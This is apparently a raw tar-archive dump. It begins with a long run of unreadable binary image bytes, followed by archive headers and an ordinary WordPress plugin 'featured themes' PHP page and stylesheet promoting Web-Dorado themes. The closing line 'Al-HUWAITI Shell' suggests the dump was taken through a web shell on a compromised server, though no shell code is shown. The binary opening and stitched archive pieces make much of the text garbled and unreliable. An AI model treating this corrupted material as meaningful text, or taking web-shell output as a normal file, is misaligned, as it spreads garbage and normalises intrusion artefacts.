G+ԓLg�@����%=]!(�Ѕ<6��z�X�h��aZy/�S̉�!�w�t�����Iz	5ƒ��!3�W��IQ#y��˨T���
tA��#o�W�������KP+S�:�m/&,���M%�	Īt$�B��v��Ccg���%�#
#o=vZ	R��h�SՏ�[c8`qk
�˽ P��ד��U����gk�}]�R�;�R���;l[�.C�p,ĭi���F�x��0��S��U�*��T�(�H�7��jOQ=�Z�C��,���[ߕ
�kT�R�[	���n��&��j$r99��J�8�
��%u.�@�5Y��B�X��$���%l��?�8=�*@�<�/�o� ��D��n�J.����3s�Ar�u���K`L":��vAJ
�{ԓT"ݪ>'	0Q)I(W+���D��v�/�����P�P��ȫVOM�F� ��[�Y�2���bOSB�b,�毾����X��\+>�&��pk	�o�r_�TP�rA����ʣ
]�W���Q���U�W�8�ƒ��Kx8�'X$}
Ϛ{p��	tQ�B4MC�Q%�ⲡD"�|��,�593�9��B2�#�H����A���3B���4�=�����imT��&��<]�!��c���H���u�,��ts���?�����X#�^�ϱ�^	D�k=9��i߱�n���n8\�Ad �39�E�\M�'�F�[�P��QS*����aɈJ��z�<��BG
��)k*!@�j���P>��'���i����^�\�[�U�������gk��M�W	i��:u��8�k�)��,o����;�	�7�p��42���x}�����ĢH�/�yj���R�AL�h.�*�KA��(2��28Ziv�9������x��0ʲ_#d=����\��~t��
�p�c��fЭ
W@�c�?wȥt+M^~�_}���i�	�@!$쫼�'���W���X�K;.�ܐ��
Gc��ޮ��
1�moE3�12�����T���Y[@_&�x"��m�V��J�yy=i����<Z-��L��i��ۈ�X�1hr
�]꣑+P_I��ו��é�u������z�ik���e�?
������W 9M�ۋ��(�b�k����]�576�~����(,���)��F�|�;��z�p8A_kG �����=����
�dBi����zP��]��pmg��~���Ӹ�Z�W�)Ԣ��w��k��_��� ��tn�>�Q��W�{U�>��y�Fp��,�TY�x8��V8������h����)�[ʫ�fK�qjG���ꅸava��P��ݑK'&��u���={���HBԚ�Xea��;�Jp|����z���j��Ֆ�WZ�w�2p��J&���o!�W���S4F,CKS�Ň�9��:%�V�jn��|߽,^�m�0����t�
i
i�2]���`�/7F�Z��r�uV"���q��s^!2����+V���,y;���-��Yi���рq��Z��x�������
i��y�?Ϸ���4�Ds����7V�:��޷�[�0���?�GHnP�7f+�Z�~<��h����	�W7#�zMP�]y��5~�s���b?��V�Z���y��X�8����{}9I���ZP�9�B�jf���6�y7�@�h���r?·�P������JB[��W�+5!W�]�����p�A��m6�60��<��9#�m���v-���t��q�Tb,���p�%�O�y��^2��8Λ�4o�jƖ
�rr/�7W���kYmY��x6�B��g��>�k��\nC�99����Vm��qB>�I�?����޽������mW�C�����5��c\�z�s���6�
q�MP��ɛ�e�e'�`�I(��!}��Oi� 㺕׵ՠ��+���s��5w��\8�'af�<KGC��V_۵���	�ٜ��E= �( +_������5nd��J��
�Qj�/������������a��X;�V�>�k���8����	�Ng�཮5굃k��K�m~��2���A!�e�VƗ	�e�ʝ�^�;k̝���k�ܟf�4�`ϻҦ�1>́�E��#0�x���n@��h����Kv�
7(���88���
ԟҔ�8Z�
i���s9�R�*��
�?�H�uk��&�6_q��;�_�p��4����'��a ����a���s�F޹aA�j9ܿe����9���֨�x������!����k�
ű�V����(�p��1���A���DA[s��vXm5Vچ�	��
�	iR�@�����Ś13�����Ӝq�� �8�­9V�+�A��K��	]I+��й7F_���g��<��z�5WI�Z�kz:��E)�A��{�J;�V�E�V��JX��J�������o�*p�y�Z���P8�^
�{���� _����8V�rZ��J=8��
^x;� u=�r�\�+ōh>Vk2�IaH�M�(����Zos�J��rL�j�.#��,��إdÙw[��ݤ)�!L�[�a�.~v;�d�&c=^���z�+��Z�����h���+v�%
�����^���~�����	�/��b+}���{��`å"��B��{�<ZX��f��c�_�D���Y�S�
��:o������kf>���m�@m�mPl�mPl�mPl�mPl�-i�_�O�8��e�IEND�B`�featured/featured_themes.php000060400000007453152434416630012235 0ustar00<?php
function fmc_featured_themes_page() { 

	$slug = 'contact-form-maker';
	$image_url = WD_FMC_URL . "/featured/images/";
	$demo_url = 'http://themedemo.web-dorado.com/';
	$site_url = 'https://web-dorado.com/wordpress-themes/';


	$WDWThemes = array(
			"business_elite" => array(
				"title" => "Business Elite",
				"description" =>"Business Elite is a robust parallax theme for business websites. The theme uses smooth transitions and many functional sections.",
				"link" => "business-elite.html",
				"demo" => "theme-businesselite",
				"image" => "business_elite.jpg"
			),
			"portfolio" => array(
				"title" => "Portfolio Gallery",
				"description" =>"Portfolio Gallery helps to display images using various color schemes and layouts combined with elegant fonts and content parts.",
				"link" => "portfolio-gallery.html",
				"demo" => "theme-portfoliogallery",
				"image" => "portfolio_gallery.jpg"
			),
			"sauron" => array(
				"title" => "Sauron",
				"description" =>"Sauron is a multipurpose parallax theme, which uses multiple interactive sections designed for the client-engagement.",
				"link" => "sauron.html",
				"demo" => "theme-sauron",
				"image" => "sauron.jpg"
			),
			"business_world" => array(
				"title" => "Business World",
				"description" => "Business World is an innovative WordPress theme great for Business websites.",
				"link" => "business-world.html",
				"demo" => "theme-businessworld",
				"image" => "business_world.jpg"
			),
			"best_magazine" => array(
				"title" => "Best Magazine",
				"description" =>"Best Magazine is an ultimate selection when you are dealing with multi-category news websites.",
				"link" => "best-magazine.html",
				"demo" => "theme-bestmagazine",
				"image" => "best_magazine.jpg"
			),
			"magazine" => array(
				"title" => "News Magazine",
				"description" =>"Magazine theme is a perfect solution when creating news and informational websites. It comes with a wide range of layout options.",
				"link" => "news-magazine.html",
				"demo" => "theme-newsmagazine",
				"image" => "news_magazine.jpg"
			)
		);
	?>
	
	<style>
	
	#main_featured_themes_page #featured-themes-list li a.download {
			padding-right: 30px;
			background:url(<?php echo $image_url; ?>down.png) no-repeat right;
	}
	
	</style>
	
	
	<div id="main_featured_themes_page">
    <div class="featured_container">
				<div class="page_header">
					<h1><?php echo "Featured Themes"; ?></h1>
				</div>
        <div class="featured_header">
            <a target="_blank" href="https://web-dorado.com/wordpress-themes.html?source=<?php echo $slug; ?>">
                <h1><?php echo "WORDPRESS THEMES"; ?></h1>
                <h2 class="get_themes"><?php echo "ALL FOR $40 ONLY "; ?><span>- <?php echo "SAVE 80%"; ?></span></h2>
								<div class="try-now">
									<span><?php echo "TRY NOW"; ?></span>
								</div>
            </a>
        </div>
				<ul id="featured-themes-list">
				<?php foreach($WDWThemes as $key=>$WDWTheme) : ?>
						<li class="<?php echo $key; ?>">
								<div class="theme_img">
									<img src="<?php echo $image_url . $WDWTheme["image"]; ?>">
								</div>
								<div class="title">
										<h3 class="heading"><?php echo $WDWTheme["title"]; ?></h3>
								</div>
								<div class="description">
										<p><?php echo $WDWTheme["description"]; ?></p>
								</div>
								<div class="links">
								<a target="_blank" href="<?php echo $demo_url . $WDWTheme["demo"]."?source=".$slug; ?>" class="demo"><?php echo "Demo"; ?></a>
								<a target="_blank" href="<?php echo $site_url . $WDWTheme["link"]."?source=".$slug; ?>" class="download"><?php echo "Free Download"; ?></a>
								</div>
						</li>		
				<?php endforeach; ?>
				</ul>
		</div>
	</div>


<?php }
?>
featured/featured_themes.css000060400000011006152434416630012223 0ustar00@import url(https://fonts.googleapis.com/css?family=Oswald);

	#main_featured_themes_page #featured-themes-list {
			position:relative;
			margin:0px auto;
			height:auto;
			display:table;
			list-style:none;
			text-align: center;
			width: 100%;
	}
	#main_featured_themes_page #featured-themes-list li {
			display: inline-table;
			width: 300px;
			margin: 20px 10px 0px 10px;
			background: #FFFFFF;
			border-right: 3px solid #E5E5E5;
			border-bottom: 3px solid #E5E5E5;
			position: relative;
	}
	@media screen and (min-width: 1600px) {
		#main_featured_themes_page #featured-themes-list li {
			width:400px;
		}

	}
	#main_featured_themes_page .theme_img img {
			max-width: 100%;
	}
	#main_featured_themes_page .theme_img {
			display: inline-block;
			overflow: hidden;
			outline: 1px solid #D6D1D1;
			position:relative;
			/*height: 168px;	*/
	}
	#main_featured_themes_page #featured-themes-list li  .title {
			width: 91%;
			text-align: center;
			margin: 0 auto;
	}
	#main_featured_themes_page {
			font-family: Oswald;
	}
	#main_featured_themes_page #featured-themes-list li  .title  .heading {
			display: block;
			position: relative;
			font-size: 17px;
			color: #666666;
			margin: 13px 0px 13px 0px;
			text-transform: uppercase;
	}
	#main_featured_themes_page #featured-themes-list li  .title  p {
			font-size:14px;
			color:#444;
			margin-left:20px;
	}
	#main_featured_themes_page #featured-themes-list li  .description {
			height:130px;
			width: 90%;
			margin: 0 auto;
	}
	#main_featured_themes_page #featured-themes-list li  .description  p {
			text-align: center;
			width: 100%;
			color: #666666;
			font-family: "Open Sans",sans-serif;
			font-size: 14px;
	}
	#main_featured_themes_page #featured-themes-list li .links {
			border-top: 1px solid #d8d8d8;
			width: 90%;
			margin: 0 auto;
			font-size: 14px;
			line-height: 40px;
			font-weight: bolder;
			text-align: center;
			padding-top: 9px;
			padding-bottom: 12px;
	}
	#main_featured_themes_page .page_header h1 {
			margin: 0px;
			font-family: Segoe UI;
			padding-bottom: 15px;
			color: rgb(111, 111, 111);
			font-size: 24px;
			text-align:center;
	}
	#main_featured_themes_page .page_header {
			height: 40px;
			padding: 22px 0px 0px 0px;
			margin-bottom: 15px;
			/*border-bottom: rgb(111, 111, 111) solid 1px;*/
	}
	#main_featured_themes_page #featured-themes-list li a {
			outline: none;
			line-height: 29px;
			text-decoration: none;
			color: #134d68;
			font-family: "Open Sans",sans-serif;
			text-shadow: 1px 0;
			display: inline-block;
			font-size: 15px;
	}
	#main_featured_themes_page #featured-themes-list li a.demo {
			color: #ffffff;
			background: #F47629;
			border-radius: 3px;
			width: 76px;
			text-align:center;
		margin-right: 12px;
	}
	#main_featured_themes_page .featured_header{
    background: #11465F;
    border-right: 3px solid #E5E5E5;
    border-bottom: 3px solid #E5E5E5;
    position: relative;
    padding: 20px 0;
	}
	#main_featured_themes_page .featured_header .try-now {
    text-align: center;
  }
	#main_featured_themes_page .featured_header .try-now span {
    display: inline-block;
    padding: 7px 16px;
    background: #F47629;
    border-radius: 10px;
    color: #ffffff;
    font-size: 23px;
  }
	#main_featured_themes_page .featured_container {
			position: relative;
			width: 90%;
			margin: 15px auto 0px auto;
	}
	#main_featured_themes_page .featured_container .old_price{
			color: rgba(180, 180, 180, 0.3);
			text-decoration: line-through;
			font-family: Oswald;
	}
	#main_featured_themes_page .featured_container .get_themes{
			color: #FFFFFF;
			height: 85px;
			margin: 0;
			background-size: 95% 100%;
			background-position: center;
			line-height: 60px;
			font-size: 45px;
			text-align: center;
			letter-spacing: 3px;
	}
	#main_featured_themes_page .featured_header h1{
			font-size: 45px;
			text-align: center;
			color: #ffffff;
			letter-spacing: 3px;
			line-height: 10px;
	}
	#main_featured_themes_page .featured_header a{
			text-decoration: none;
	}
	@media screen and (max-width: 1035px) {
			#main_featured_themes_page .featured_header h1{
					font-size: 37px;
					line-height: 0;
			}
	}
	@media screen and (max-width: 835px) {
			#main_featured_themes_page .get_themes span{
					display: none;
			}
	}
	@media screen and (max-width: 435px) {	
			#main_featured_themes_page .featured_header h1 {
					font-size: 20px;
					line-height: 17px;
			}
	}

Al-HUWAITI Shell